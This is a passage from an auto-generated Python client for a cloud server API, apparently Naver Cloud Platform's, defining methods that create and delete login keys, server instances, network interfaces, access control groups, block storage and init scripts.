_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_login_key(self, create_login_key_request, **kwargs): # noqa: E501
"""create_login_key # noqa: E501
Create a login key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_login_key(create_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateLoginKeyRequest create_login_key_request: createLoginKeyRequest (required)
:return: CreateLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_login_key_with_http_info(create_login_key_request, **kwargs) # noqa: E501
else:
(data) = self.create_login_key_with_http_info(create_login_key_request, **kwargs) # noqa: E501
return data
def create_login_key_with_http_info(self, create_login_key_request, **kwargs): # noqa: E501
"""create_login_key # noqa: E501
Create a login key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_login_key_with_http_info(create_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateLoginKeyRequest create_login_key_request: createLoginKeyRequest (required)
:return: CreateLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_login_key_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_login_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_login_key_request' is set
if ('create_login_key_request' not in params or
params['create_login_key_request'] is None):
raise ValueError("Missing the required parameter `create_login_key_request` when calling `create_login_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_login_key_request' in params:
body_params = params['create_login_key_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createLoginKey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateLoginKeyResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_member_server_image_instance(self, create_member_server_image_instance_request, **kwargs): # noqa: E501
"""create_member_server_image_instance # noqa: E501
Create a member server image instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_member_server_image_instance(create_member_server_image_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateMemberServerImageInstanceRequest create_member_server_image_instance_request: createMemberServerImageInstanceRequest (required)
:return: CreateMemberServerImageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_member_server_image_instance_with_http_info(create_member_server_image_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_member_server_image_instance_with_http_info(create_member_server_image_instance_request, **kwargs) # noqa: E501
return data
def create_member_server_image_instance_with_http_info(self, create_member_server_image_instance_request, **kwargs): # noqa: E501
"""create_member_server_image_instance # noqa: E501
Create a member server image instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_member_server_image_instance_with_http_info(create_member_server_image_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateMemberServerImageInstanceRequest create_member_server_image_instance_request: createMemberServerImageInstanceRequest (required)
:return: CreateMemberServerImageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_member_server_image_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_member_server_image_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_member_server_image_instance_request' is set
if ('create_member_server_image_instance_request' not in params or
params['create_member_server_image_instance_request'] is None):
raise ValueError("Missing the required parameter `create_member_server_image_instance_request` when calling `create_member_server_image_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_member_server_image_instance_request' in params:
body_params = params['create_member_server_image_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createMemberServerImageInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateMemberServerImageInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_network_interface(self, create_network_interface_request, **kwargs): # noqa: E501
"""create_network_interface # noqa: E501
Create a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_network_interface(create_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateNetworkInterfaceRequest create_network_interface_request: createNetworkInterfaceRequest (required)
:return: CreateNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_network_interface_with_http_info(create_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.create_network_interface_with_http_info(create_network_interface_request, **kwargs) # noqa: E501
return data
def create_network_interface_with_http_info(self, create_network_interface_request, **kwargs): # noqa: E501
"""create_network_interface # noqa: E501
Create a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_network_interface_with_http_info(create_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateNetworkInterfaceRequest create_network_interface_request: createNetworkInterfaceRequest (required)
:return: CreateNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_network_interface_request' is set
if ('create_network_interface_request' not in params or
params['create_network_interface_request'] is None):
raise ValueError("Missing the required parameter `create_network_interface_request` when calling `create_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_network_interface_request' in params:
body_params = params['create_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_placement_group(self, create_placement_group_request, **kwargs): # noqa: E501
"""create_placement_group # noqa: E501
Create a physical placement group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_placement_group(create_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePlacementGroupRequest create_placement_group_request: createPlacementGroupRequest (required)
:return: CreatePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_placement_group_with_http_info(create_placement_group_request, **kwargs) # noqa: E501
else:
(data) = self.create_placement_group_with_http_info(create_placement_group_request, **kwargs) # noqa: E501
return data
def create_placement_group_with_http_info(self, create_placement_group_request, **kwargs): # noqa: E501
"""create_placement_group # noqa: E501
Create a physical placement group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_placement_group_with_http_info(create_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePlacementGroupRequest create_placement_group_request: createPlacementGroupRequest (required)
:return: CreatePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_placement_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_placement_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_placement_group_request' is set
if ('create_placement_group_request' not in params or
params['create_placement_group_request'] is None):
raise ValueError("Missing the required parameter `create_placement_group_request` when calling `create_placement_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_placement_group_request' in params:
body_params = params['create_placement_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createPlacementGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreatePlacementGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_public_ip_instance(self, create_public_ip_instance_request, **kwargs): # noqa: E501
"""create_public_ip_instance # noqa: E501
Create a public IP instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_public_ip_instance(create_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePublicIpInstanceRequest create_public_ip_instance_request: createPublicIpInstanceRequest (required)
:return: CreatePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_public_ip_instance_with_http_info(create_public_ip_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_public_ip_instance_with_http_info(create_public_ip_instance_request, **kwargs) # noqa: E501
return data
def create_public_ip_instance_with_http_info(self, create_public_ip_instance_request, **kwargs): # noqa: E501
"""create_public_ip_instance # noqa: E501
Create a public IP instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_public_ip_instance_with_http_info(create_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePublicIpInstanceRequest create_public_ip_instance_request: createPublicIpInstanceRequest (required)
:return: CreatePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_public_ip_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_public_ip_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_public_ip_instance_request' is set
if ('create_public_ip_instance_request' not in params or
params['create_public_ip_instance_request'] is None):
raise ValueError("Missing the required parameter `create_public_ip_instance_request` when calling `create_public_ip_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_public_ip_instance_request' in params:
body_params = params['create_public_ip_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createPublicIpInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreatePublicIpInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_server_instances(self, create_server_instances_request, **kwargs): # noqa: E501
"""create_server_instances # noqa: E501
Create server instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_server_instances(create_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateServerInstancesRequest create_server_instances_request: createServerInstancesRequest (required)
:return: CreateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_server_instances_with_http_info(create_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.create_server_instances_with_http_info(create_server_instances_request, **kwargs) # noqa: E501
return data
def create_server_instances_with_http_info(self, create_server_instances_request, **kwargs): # noqa: E501
"""create_server_instances # noqa: E501
Create server instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_server_instances_with_http_info(create_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateServerInstancesRequest create_server_instances_request: createServerInstancesRequest (required)
:return: CreateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_server_instances_request' is set
if ('create_server_instances_request' not in params or
params['create_server_instances_request'] is None):
raise ValueError("Missing the required parameter `create_server_instances_request` when calling `create_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_server_instances_request' in params:
body_params = params['create_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
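
    # Usage sketch (illustrative): a plain synchronous call. The import name
    # `ncloud_server`, the `V2Api` class, and the `configuration` object are
    # assumptions based on typical swagger-codegen package layouts; only the
    # request/response model names are confirmed by the docstrings above.
    #
    #   import ncloud_server
    #
    #   api = ncloud_server.V2Api(ncloud_server.ApiClient(configuration))
    #   request = ncloud_server.CreateServerInstancesRequest()
    #   response = api.create_server_instances(request)
    #   print(response)  # a CreateServerInstancesResponse model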

    def delete_access_control_group(self, delete_access_control_group_request, **kwargs): # noqa: E501
        """delete_access_control_group # noqa: E501

        Delete an Access Control Group (ACG) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_access_control_group(delete_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteAccessControlGroupRequest delete_access_control_group_request: deleteAccessControlGroupRequest (required)
:return: DeleteAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_access_control_group_with_http_info(delete_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.delete_access_control_group_with_http_info(delete_access_control_group_request, **kwargs) # noqa: E501
return data

    def delete_access_control_group_with_http_info(self, delete_access_control_group_request, **kwargs): # noqa: E501
        """delete_access_control_group # noqa: E501

        Delete an Access Control Group (ACG) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_access_control_group_with_http_info(delete_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteAccessControlGroupRequest delete_access_control_group_request: deleteAccessControlGroupRequest (required)
:return: DeleteAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_access_control_group_request' is set
if ('delete_access_control_group_request' not in params or
params['delete_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `delete_access_control_group_request` when calling `delete_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_access_control_group_request' in params:
body_params = params['delete_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
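
    # Usage sketch (illustrative): handling failed calls. Swagger-generated
    # clients conventionally raise ApiException from their `rest` module on
    # non-2xx responses; that import path is an assumption here.
    #
    #   from ncloud_server.rest import ApiException
    #
    #   try:
    #       response = api.delete_access_control_group(request)
    #   except ApiException as e:
    #       print("deleteAccessControlGroup failed: %s" % e)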

    def delete_block_storage_instances(self, delete_block_storage_instances_request, **kwargs): # noqa: E501
        """delete_block_storage_instances # noqa: E501

        Delete block storage instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_instances(delete_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageInstancesRequest delete_block_storage_instances_request: deleteBlockStorageInstancesRequest (required)
:return: DeleteBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_block_storage_instances_with_http_info(delete_block_storage_instances_request, **kwargs) # noqa: E501
else:
(data) = self.delete_block_storage_instances_with_http_info(delete_block_storage_instances_request, **kwargs) # noqa: E501
return data

    def delete_block_storage_instances_with_http_info(self, delete_block_storage_instances_request, **kwargs): # noqa: E501
        """delete_block_storage_instances # noqa: E501

        Delete block storage instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_instances_with_http_info(delete_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageInstancesRequest delete_block_storage_instances_request: deleteBlockStorageInstancesRequest (required)
:return: DeleteBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_block_storage_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_block_storage_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_block_storage_instances_request' is set
if ('delete_block_storage_instances_request' not in params or
params['delete_block_storage_instances_request'] is None):
raise ValueError("Missing the required parameter `delete_block_storage_instances_request` when calling `delete_block_storage_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_block_storage_instances_request' in params:
body_params = params['delete_block_storage_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteBlockStorageInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteBlockStorageInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def delete_block_storage_snapshot_instances(self, delete_block_storage_snapshot_instances_request, **kwargs): # noqa: E501
        """delete_block_storage_snapshot_instances # noqa: E501

        Delete block storage snapshot instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_snapshot_instances(delete_block_storage_snapshot_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageSnapshotInstancesRequest delete_block_storage_snapshot_instances_request: deleteBlockStorageSnapshotInstancesRequest (required)
:return: DeleteBlockStorageSnapshotInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_block_storage_snapshot_instances_with_http_info(delete_block_storage_snapshot_instances_request, **kwargs) # noqa: E501
else:
(data) = self.delete_block_storage_snapshot_instances_with_http_info(delete_block_storage_snapshot_instances_request, **kwargs) # noqa: E501
return data

    def delete_block_storage_snapshot_instances_with_http_info(self, delete_block_storage_snapshot_instances_request, **kwargs): # noqa: E501
        """delete_block_storage_snapshot_instances # noqa: E501

        Delete block storage snapshot instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_snapshot_instances_with_http_info(delete_block_storage_snapshot_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageSnapshotInstancesRequest delete_block_storage_snapshot_instances_request: deleteBlockStorageSnapshotInstancesRequest (required)
:return: DeleteBlockStorageSnapshotInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_block_storage_snapshot_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_block_storage_snapshot_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_block_storage_snapshot_instances_request' is set
if ('delete_block_storage_snapshot_instances_request' not in params or
params['delete_block_storage_snapshot_instances_request'] is None):
raise ValueError("Missing the required parameter `delete_block_storage_snapshot_instances_request` when calling `delete_block_storage_snapshot_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_block_storage_snapshot_instances_request' in params:
body_params = params['delete_block_storage_snapshot_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteBlockStorageSnapshotInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteBlockStorageSnapshotInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def delete_init_scripts(self, delete_init_scripts_request, **kwargs): # noqa: E501
        """delete_init_scripts # noqa: E501

        Delete init scripts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_init_scripts(delete_init_scripts_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteInitScriptsRequest delete_init_scripts_request: deleteInitScriptsRequest (required)
:return: DeleteInitScriptsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_init_scripts_with_http_info(delete_init_scripts_request, **kwargs) # noqa: E501
else:
(data) = self.delete_init_scripts_with_http_info(delete_init_scripts_request, **kwargs) # noqa: E501
return data

    def delete_init_scripts_with_http_info(self, delete_init_scripts_request, **kwargs): # noqa: E501
        """delete_init_scripts # noqa: E501

        Delete init scripts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_init_scripts_with_http_info(delete_init_scripts_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteInitScriptsRequest delete_init_scripts_request: deleteInitScriptsRequest (required)
:return: DeleteInitScriptsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_init_scripts_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_init_scripts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_init_scripts_request' is set
if ('delete_init_scripts_request' not in params or
params['delete_init_scripts_request'] is None):
raise ValueError("Missing the required parameter `delete_init_scripts_request` when calling `delete_init_scripts`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_init_scripts_request' in params:
body_params = params['delete_init_scripts_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteInitScripts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteInitScriptsResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
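
    # Usage sketch (illustrative): calling the *_with_http_info variant
    # directly. In typical swagger-codegen clients, call_api returns a
    # (data, status_code, headers) tuple when `_return_http_data_only` is
    # not set, which is why the plain wrapper above forces that flag to
    # True before delegating; the tuple shape is an assumption here.
    #
    #   data, status, headers = api.delete_init_scripts_with_http_info(request)
    #   assert status == 200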

    def delete_login_keys(self, delete_login_keys_request, **kwargs): # noqa: E501
        """delete_login_keys # noqa: E501

        Delete login keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_login_keys(delete_login_keys_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteLoginKeysRequest delete_login_keys_request: deleteLoginKeysRequest (required)
:return: DeleteLoginKeysResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_login_keys_with_http_info(delete_login_keys_request, **kwargs) # noqa: E501
else:
(data) = self.delete_login_keys_with_http_info(delete_login_keys_request, **kwargs) # noqa: E501
return data

    def delete_login_keys_with_http_info(self, delete_login_keys_request, **kwargs): # noqa: E501
        """delete_login_keys # noqa: E501

        Delete login keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_login_keys_with_http_info(delete_login_keys_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteLoginKeysRequest delete_login_keys_request: deleteLoginKeysRequest (required)
:return: DeleteLoginKeysResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_login_keys_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_login_keys" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_login_keys_request' is set
if ('delete_login_keys_request' not in params or
params['delete_login_keys_request'] is None):
raise ValueError("Missing the required parameter `delete_login_keys_request` when calling `delete_login_keys`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
